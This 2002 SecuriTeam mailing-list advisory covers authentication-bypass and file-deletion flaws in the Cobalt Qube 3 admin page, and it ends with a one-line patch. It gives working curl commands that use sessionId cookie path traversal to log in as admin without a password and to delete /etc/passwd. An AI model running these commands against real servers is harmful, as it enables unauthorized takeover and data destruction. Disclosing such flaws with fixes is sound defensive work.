[UNIX] Cobalt Qube 3 Administration Page Insecurity

From: support@securiteam.com
Date: 07/25/02


From: support@securiteam.com
To: list@securiteam.com
Date: Thu, 25 Jul 2002 12:05:17 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Cobalt Qube 3 Administration Page Insecurity
------------------------------------------------------------------------

SUMMARY

Several security vulnerabilities have been found in the Cobalt Qube 3
product, the vulnerabilities would allow an attacker to bypass the
authentication mechanism gaining administrative privileges and to delete
any file they want.

DETAILS

Vulnerable systems:
Cobalt Qube 3 release 6.0 (Kernel 2.2.16C7)

Problem 1: Local Privilege Escalation to Admin
Any user with ability to create file in any location of a Cobalt server
will be able to promote to Admin access of the System Management. A user
may create a file in /tmp/test and constructed a cookie to login as Admin
without password:

Create dummy session file in Cobalt server:

$ printf "admin" > /tmp/test

Login without password from anywhere:

$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin
http://192.168.0.1:444/splashAdmin.php

Problem 2: Remote User access
By using the account name of newly created user, we can bypass the
authentication without a need to create dummy session file in the server:

$curl -b sessionId=../codb/objects/4/.name\;loginName=admin
http://192.168.0.1:444/splashAdmin.php

Problem 3: Remotely delete files
It is possible to delete file from the server by specifying the path to
the file and the first 31 characters of the file. The following example
will delete the /etc/passwd file from the server:

$curl -b
sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash http://192.168.0.1:444/splashAdmin.php

Quick Solution:
Modify file /usr/sausalito/ui/libPhp/ServerScriptHelper.php:

line 64:
$sessionId = ereg_replace("\.\.","",$sessionId);

ADDITIONAL INFORMATION

The information has been provided by
<mailto:pokleyzz@scan-associates.net> pokleyzz,
<mailto:sk@scan-associates.net> sk, and
<mailto:shaharil@scan-associates.net> shaharil.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • Re: New to SMS - have a Collections question.
    ... local admin of both the SMS server and the server the database is on. ... However this is a security problem. ... Access to objects is based on Security Rights (if you scroll down the ...
    (microsoft.public.sms.admin)
  • Re: Secure host newbie - fun - humm
    ... decision, as the admin, whether or not to take down the server. ... Listen, as a security specialist, I *know* that every single box that I, ... some level of risk and that there is no "100% I'm secure" level. ...
    (Security-Basics)
  • security-basics Digest of: get.123_145
    ... VPN to ASP a security risk? ... Re: Multiple IPSec tunnels? ... Subject: Security NT Server ... VPN to ASP a security risk? ...
    (Security-Basics)
  • Re: << SBS News of the week - Sept 26 >>
    ... > And he points to the info you need to put the file on the server in the ... > at the network perimeter. ... The Symantec Firewall/VPN and the Gateway Security ... An attacker can exploit these flaws in tandem via specially ...
    (microsoft.public.backoffice.smallbiz2000)
  • << SBS News of the week - Sept 26 >>
    ... And he points to the info you need to put the file on the server in the ... at the network perimeter. ... The Symantec Firewall/VPN and the Gateway Security ... by the firewall at risk. ...
    (microsoft.public.windows.server.sbs)